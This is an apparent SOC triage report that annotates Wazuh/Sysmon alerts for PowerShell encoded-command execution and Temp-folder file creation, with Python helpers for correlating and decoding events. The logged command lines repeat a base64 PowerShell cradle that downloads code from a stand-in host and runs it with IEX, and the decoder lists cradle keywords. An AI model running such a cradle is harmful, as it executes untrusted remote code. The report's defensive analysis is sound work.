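Feed it the commandLine, parentImage and parentCommandLine of any EID 1. A result with encoded True but decoded None means the operand was not valid Base64 of UTF-16LE text; powershell.exe would have rejected it, so the process most likely did nothing, but the attempt itself is worth a note.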

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:33.445+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:33.445+0000
When the Wazuh manager processed the alert. It trails the endpoint: data.win.eventdata.utcTime below is 22:55:31.110, about 2.3 s earlier. Build the endpoint timeline from utcTime and use this field only to order alerts on the manager.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). T1105 here is the rule author's mapping for "new file in a folder malware likes", not something the event proves: an EID 11 only says a file was created locally. Check the TargetFilename below before treating this as a tool transfer.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  119
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535333.2694811
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon: the event ID and eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the Sysmon ETW provider (fixed for every Sysmon install); useful when filtering raw EVTX or ETW exports.

data.win.system.eventID:  11
Sysmon event ID, not a Security-log ID: 11 = FileCreate. Other Sysmon IDs to know: 1 process create, 3 network connection, 7 image load, 8 remote thread, 10 process access, 13 registry value set, 22 DNS query.

data.win.system.version:  2
Schema version of this event type's template; it changes when Sysmon adds fields. Only matters for parser compatibility.

data.win.system.level:  4
ETW level: 4 = Informational (1 Critical, 2 Error, 3 Warning, 5 Verbose). Sysmon writes everything at level 4, so this carries no severity signal.

data.win.system.task:  11
Task category; for Sysmon it simply mirrors the event ID (11 = FileCreate).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:31.1496733Z
When the record was written to the log (ETW clock). Compare with eventdata.utcTime (when Sysmon observed the activity) and the Wazuh timestamp (when the manager processed it): three clocks, from milliseconds to seconds apart.

data.win.system.eventRecordID:  350143
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the record (3712 on every Sysmon event here), not the process the event describes; that one is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the record. Same caveat as processID.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational means the eventdata fields below follow Sysmon's schema.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. Should equal agent.name; a mismatch means a forwarded event or a mis-registered agent.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:31.110 ProcessGuid: {94294ddc-c161-680a-d10c-000000000e00} ProcessId: 5124 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ssbpiznj.l5y.ps1 CreationUtcTime: 2025-04-24 22:55:31.110 User: Attacker\Attcker1"
Sysmon's rendered text for the event; the eventdata fields below are parsed from it. Keep it as the evidence copy.

data.win.eventdata.utcTime:  2025-04-24 22:55:31.110
When Sysmon saw the file being created (UTC): 1.89 s after PID 5124 started (its EID 1 UtcTime is 22:55:29.220), again consistent with a start-up side effect.

data.win.eventdata.processGuid:  {94294ddc-c161-680a-d10c-000000000e00}
GUID of the creating process. It equals the ProcessGuid of the EID 1 alert above (PID 5124, the second encoded-command PowerShell), which attributes this file create to that launch with no PID guesswork.

data.win.eventdata.processId:  5124
PID of the creator; a convenience next to the GUID, and recycled after exit.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Process that created the file: powershell.exe itself, not a dropper, archiver or browser.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ssbpiznj.l5y.ps1
The created file. As in the previous EID 11, __PSScriptPolicyTest_<random>.<random>.ps1 in %LOCALAPPDATA%\Temp is the probe file powershell.exe writes at start-up to test AppLocker/WDAC script enforcement, normally deleted right after. A launch artefact, not a payload: rule 92213 matched on "script file in Temp" alone, so the severity here is inherited from the T1105 mapping, not earned by the file. The evidence is the EID 1 above; this event only confirms that PID 5124 is another PowerShell instance.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:31.110
File-system creation time of the file. Equal to UtcTime, i.e. a brand-new file; an earlier value would mean an existing file was overwritten.

data.win.eventdata.user:  Attacker\\Attcker1
Account that created the file; the same local user as in the process events.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
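Both "Executable file dropped" alerts on this page (rule 92213) fire on a .ps1 in Temp that the PowerShell from the preceding EID 1 wrote at start-up, so the analyst's question is which file creates are worth opening and which process chain they belong to. The block below is an added example for this report, not SOCscribe or Wazuh code: it joins EID 11 to EID 1 on ProcessGuid (the Sysmon field that makes that join reliable across PID reuse), walks ParentProcessGuid back to reconstruct the chain 14568 → 15812 → 5124 → 7424, and labels the PowerShell start-up probe file so it is not mistaken for a payload. SAMPLE_EVENTS is a constructed sample hand-copied from the eventdata fields of the alerts on this page; the classification labels and the RISKY_EXT list are this example's own assumptions.

```python
"""Join Sysmon EID 11 (FileCreate) to EID 1 (ProcessCreate) on ProcessGuid.

Added example for this report, not SOCscribe or Wazuh code. SAMPLE_EVENTS is a
constructed sample copied from the data.win.eventdata.* fields of the alerts on
this page; the labels returned by classify_file_create and the RISKY_EXT list
are this example's own assumptions.
"""
import re
from datetime import datetime

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP_DIR = r"C:\Users\Attcker1\AppData\Local\Temp"

# Only the fields this example needs; key names follow Wazuh's data.win.eventdata.* fields.
SAMPLE_EVENTS = [
    {"eventID": 1, "utcTime": "2025-04-24 22:55:27.053", "processId": 15812, "image": PS_EXE,
     "processGuid": "{94294ddc-c15f-680a-cf0c-000000000e00}",
     "parentProcessGuid": "{94294ddc-c159-680a-cb0c-000000000e00}", "parentProcessId": 14568},
    {"eventID": 11, "utcTime": "2025-04-24 22:55:27.733", "processId": 15812, "image": PS_EXE,
     "processGuid": "{94294ddc-c15f-680a-cf0c-000000000e00}",
     "targetFilename": TEMP_DIR + r"\__PSScriptPolicyTest_bpcztlkl.1e1.ps1"},
    {"eventID": 1, "utcTime": "2025-04-24 22:55:29.220", "processId": 5124, "image": PS_EXE,
     "processGuid": "{94294ddc-c161-680a-d10c-000000000e00}",
     "parentProcessGuid": "{94294ddc-c15f-680a-cf0c-000000000e00}", "parentProcessId": 15812},
    {"eventID": 11, "utcTime": "2025-04-24 22:55:31.110", "processId": 5124, "image": PS_EXE,
     "processGuid": "{94294ddc-c161-680a-d10c-000000000e00}",
     "targetFilename": TEMP_DIR + r"\__PSScriptPolicyTest_ssbpiznj.l5y.ps1"},
    {"eventID": 1, "utcTime": "2025-04-24 22:55:33.660", "processId": 7424, "image": PS_EXE,
     "processGuid": "{94294ddc-c165-680a-d60c-000000000e00}",
     "parentProcessGuid": "{94294ddc-c161-680a-d10c-000000000e00}", "parentProcessId": 5124},
]

# powershell.exe writes __PSScriptPolicyTest_<rnd>.<rnd>.ps1 (or .psm1) to %TEMP% at start-up
# to test whether AppLocker/WDAC script enforcement applies to it: a launch artefact, not a drop.
PS_POLICY_PROBE = re.compile(r"\\Temp\\__PSScriptPolicyTest_[A-Za-z0-9]+\.[A-Za-z0-9]+\.psm?1$", re.I)
# Extensions worth a look when they land in a user-writable directory (assumption).
RISKY_EXT = re.compile(r"\.(ps1|psm1|exe|dll|bat|cmd|vbs|js|hta|scr)$", re.I)


def parse_utc(s):
    """Sysmon UtcTime / CreationUtcTime format: 'YYYY-MM-DD HH:MM:SS.mmm'."""
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def basename(path):
    return path.rsplit("\\", 1)[-1]


def build_chain(eid1_by_guid, guid):
    """Follow ParentProcessGuid back through the EID 1 events we hold.

    Returns PIDs oldest first. The first entry is the parent for which no EID 1
    was collected (started before Sysmon, or outside the query window)."""
    chain, seen, ev = [], set(), None
    while guid in eid1_by_guid and guid not in seen:  # seen guards against malformed cycles
        seen.add(guid)
        ev = eid1_by_guid[guid]
        chain.append(ev["processId"])
        guid = ev["parentProcessGuid"]
    if ev is not None:
        chain.append(ev["parentProcessId"])
    return chain[::-1]


def classify_file_create(ev):
    """Label an EID 11 so the analyst knows which ones to open first."""
    target = ev["targetFilename"]
    if basename(ev["image"]).lower() == "powershell.exe" and PS_POLICY_PROBE.search(target):
        return "powershell-startup-probe"  # side effect of a PowerShell launch, not a payload
    if RISKY_EXT.search(target):
        return "review"
    return "other"


def correlate(events):
    """For every EID 11, find its EID 1 by ProcessGuid and report delay, label and process chain."""
    eid1_by_guid = {e["processGuid"]: e for e in events if e["eventID"] == 1}
    findings = []
    for ev in events:
        if ev["eventID"] != 11:
            continue
        start = eid1_by_guid.get(ev["processGuid"])
        delay = None  # stays None when no EID 1 for this GUID is in the data set
        if start is not None:
            delay = round((parse_utc(ev["utcTime"]) - parse_utc(start["utcTime"])).total_seconds(), 3)
        findings.append({
            "file": basename(ev["targetFilename"]),
            "pid": ev["processId"],
            "seconds_after_start": delay,
            "classification": classify_file_create(ev),
            "chain": build_chain(eid1_by_guid, ev["processGuid"]) or [ev["processId"]],
        })
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

The join on ProcessGuid rather than ProcessId is the point: both file creates here happen within two seconds of a process start, and the PID alone could belong to an earlier, already exited process. A "review" label with a short seconds_after_start and a chain that ends in the encoded-command PowerShell is the pattern that would justify the T1105 mapping; the start-up probe file never is.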

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:43.204+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:43.204+0000
When the Wazuh manager processed the alert. It trails the endpoint: data.win.eventdata.utcTime below is 22:55:33.660, about 9.5 s earlier. Build the endpoint timeline from utcTime and use this field only to order alerts on the manager.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  116
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535343.2697576
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon: the event ID and eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the Sysmon ETW provider (fixed for every Sysmon install); useful when filtering raw EVTX or ETW exports.

data.win.system.eventID:  1
Sysmon event ID, not a Security-log ID: 1 = Process Create, Sysmon's richer counterpart of Security 4688 (adds hashes, process GUIDs, parent command line and parent user).

data.win.system.version:  5
Schema version of this event type's template; it changes when Sysmon adds fields (EID 1 version 5 carries ParentUser). Only matters for parser compatibility.

data.win.system.level:  4
ETW level: 4 = Informational (1 Critical, 2 Error, 3 Warning, 5 Verbose). Sysmon writes everything at level 4, so this carries no severity signal.

data.win.system.task:  1
Task category; for Sysmon it simply mirrors the event ID (1 = ProcessCreate).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:38.7316316Z
When the record was written to the log (ETW clock). Compare with eventdata.utcTime (when Sysmon observed the activity) and the Wazuh timestamp (when the manager processed it): three clocks, from milliseconds to seconds apart.

data.win.system.eventRecordID:  350329
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the record (3712 on every Sysmon event here), not the process the event describes; that one is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the record. Same caveat as processID.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational means the eventdata fields below follow Sysmon's schema.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. Should equal agent.name; a mismatch means a forwarded event or a mis-registered agent.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:33.660 ProcessGuid: {94294ddc-c165-680a-d60c-000000000e00} ProcessId: 7424 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c161-680a-d10c-000000000e00} ParentProcessId: 5124 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Rendered event text with every Sysmon field in one string. Same data as the data.win.eventdata.* fields below, just un-parsed; search it when a field failed to decode.

data.win.eventdata.utcTime:  2025-04-24 22:55:33.660
Sysmon's own timestamp for the process start (UTC, ms). Order endpoint events by this; the top-level timestamp is only when Wazuh indexed the alert.

data.win.eventdata.processGuid:  {94294ddc-c165-680a-d60c-000000000e00}
Sysmon's globally unique ID for this process. Never reused, unlike a PID, so pivot on it to link this Event ID 1 to the File Create (11), Network Connect (3) and Process Access (10) events the same process produces later.

data.win.eventdata.processId:  7424
Windows PID (7424). Reused once the process exits, so it only identifies a process together with utcTime or processGuid.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that started. This is the real powershell.exe under System32, so the question is not what ran but how it was launched and what it was told to do.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the binary's PE resource. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line; a version that does not match the host's OS build suggests a planted copy.

data.win.eventdata.description:  Windows PowerShell
Description from the PE version resource. Trivial to forge in a custom binary, so treat it as a hint, not proof.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the PE version resource. Informational only; same forgery caveat as description.

data.win.eventdata.company:  Microsoft Corporation
Company from the PE version resource. A fake can say Microsoft Corporation just as easily; trust the hash, not this string.

data.win.eventdata.originalFileName:  PowerShell.EXE
File name compiled into the PE. Compare with image: PowerShell.EXE running from a file called anything else is the classic renamed-binary evasion.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line Sysmon captured (Wazuh escapes the quotes and backslashes). -NoLogo -NoProfile -EncodedCommand is the usual cradle shape; the base64 is UTF-16LE text and decodes to a one-liner that downloads and runs https://example.com/test with IEX. Always decode before judging. The path repeated as the first argument is a quirk of how the parent built its argument list and a handy string to pivot on.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process. The user's profile root fits a shell launched in an interactive session; services normally start in System32.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as, written COMPUTER\user or DOMAIN\user. Attacker\Attcker1 is a local account on the host called Attacker.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon's GUID for the logon session the process belongs to. Identical across the whole chain, so one session spawned all of it.

data.win.eventdata.logonId:  0x26584
Logon session LUID in hex. It is the Logon ID in Security event 4624, so search 0x26584 there to find how and when Attcker1 logged on (console, RDP, network).

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 is services; 1 is the first interactive session (console or RDP). 1 here means a logged-in user session, not a service.

data.win.eventdata.integrityLevel:  Medium
Process integrity level: Low, Medium (normal user), High (elevated admin), System. Medium means nothing has elevated yet; a High-integrity child of this chain would be the escalation to look for.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file in the algorithms Sysmon is configured for (SHA256 here). Verify it against a known-good powershell.exe of the same build before trusting the binary; a mismatch means a modified or planted file.

data.win.eventdata.parentProcessGuid:  {94294ddc-c161-680a-d10c-000000000e00}
processGuid of the parent. This is the pivot that rebuilds the process tree: search it as processGuid to pull the parent's own Event ID 1.

data.win.eventdata.parentProcessId:  5124
Parent's PID. 5124 has no Event ID 1 in this report, so pull it from the Sysmon log to see what started the chain.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Parent's executable. powershell.exe spawning powershell.exe is what rule 92057 keys on; a legitimate admin rarely does it with an encoded command.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
The parent's full command line. Byte for byte the same as commandLine above, so this generation re-ran exactly the cradle its parent ran, which points to the downloaded script re-launching the same command.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent ran as. Same as the child here; a different user between parent and child would mean a privilege or session boundary was crossed.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
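The encoded command in this alert is unreadable until decoded. What follows is an added example, not part of the SOCscribe report or of Wazuh: a Python helper that pulls the -EncodedCommand argument out of a Sysmon commandLine value (accepting any unambiguous prefix of the flag, as powershell.exe does), decodes the base64/UTF-16LE payload, peels nested layers, and lists the download URLs and cradle keywords it finds. The sample command line is copied from data.win.eventdata.commandLine above, JSON escaping included; the function names are hypothetical. It goes beyond this alert in also handling nested encodings.

```python
import base64
import binascii
import re

# Constructed sample: the data.win.eventdata.commandLine value from the alert
# above, copied with Wazuh's JSON escaping of quotes and backslashes intact.
SAMPLE_COMMANDLINE = (
    r'\"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" '
    r'\"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" '
    "-NoLogo -NoProfile -EncodedCommand "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwA"
    "aQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQA"
    "dABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...)
# plus the documented alias -ec. Match "-e<letters> <base64>" and check the flag.
FLAG_RE = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\")<>]+", re.IGNORECASE)
# Substrings that mark a download-and-execute cradle; tuple order fixes output order.
INDICATORS = ("iex", "invoke-expression", "net.webclient", "downloadstring",
              "downloadfile", "invoke-webrequest", "frombase64string", "bypass")


def _is_encoded_flag(flag: str) -> bool:
    f = flag.lower()
    return f == "ec" or "encodedcommand".startswith(f)


def find_encoded(cmdline: str):
    """Return the (flag, base64) pair of the first real -EncodedCommand, or None."""
    for m in FLAG_RE.finditer(cmdline):
        if _is_encoded_flag(m.group(1)):
            return m.group(1), m.group(2)
    return None


def decode_encoded(token: str):
    """-EncodedCommand is base64 over UTF-16LE; tolerate stripped '=' padding."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Inverse of decode_encoded, used to build test inputs."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_commandline(cmdline: str, max_depth: int = 5):
    """Peel every layer of -EncodedCommand (attackers nest them), then pull URLs
    and cradle keywords out of the innermost script. None if nothing was encoded."""
    layers, current = [], cmdline
    for _ in range(max_depth):
        found = find_encoded(current)
        if found is None:
            break
        text = decode_encoded(found[1])
        if text is None:
            break
        layers.append(text)
        current = text
    if not layers:
        return None
    script = layers[-1]
    low = script.lower()
    return {
        "layers": layers,
        "decoded": script,
        "urls": URL_RE.findall(script),
        "indicators": [k for k in INDICATORS if k in low],
    }


if __name__ == "__main__":
    print(analyze_commandline(SAMPLE_COMMANDLINE))
```

Run as a script it prints the decoded cradle, IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), which is what the rest of the triage should revolve around: the host serving that URL and whatever the fetched script does next.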

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:43.247+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer. Check data.win.eventdata.targetFilename before escalating: a file named __PSScriptPolicyTest_<random>.<random>.ps1 in the user's Temp folder is written by powershell.exe itself at engine start to test whether AppLocker/WDAC script enforcement applies, so by itself it shows that PowerShell launched, not that a tool was downloaded. Pivot on processGuid to the Event ID 1 alert for the same process and judge that one instead.

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:43.247+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  120
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535343.2705639
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means eventID below uses Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's fixed provider GUID, so it filters reliably even if the name is localized or missing.

data.win.system.eventID:  11
Event ID within the provider. For Sysmon this is the event type, not a Security-log ID: 1 = Process Create, 3 = Network Connect, 7 = Image Load, 10 = Process Access, 11 = File Create, 13 = Registry Value Set. 11 here, so targetFilename is the field that matters.

data.win.system.version:  2
Schema version of this event type. Sysmon bumps it when it adds fields to an event, so an old decoder can silently drop the newer fields.

data.win.system.level:  4
Numeric event level: 4 = Informational, 3 = Warning, 2 = Error. Sysmon logs nearly everything at 4, so rank by rule.level instead.

data.win.system.task:  11
Task category. Sysmon sets it equal to the event ID, so for Sysmon events it adds nothing.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:40.0213264Z
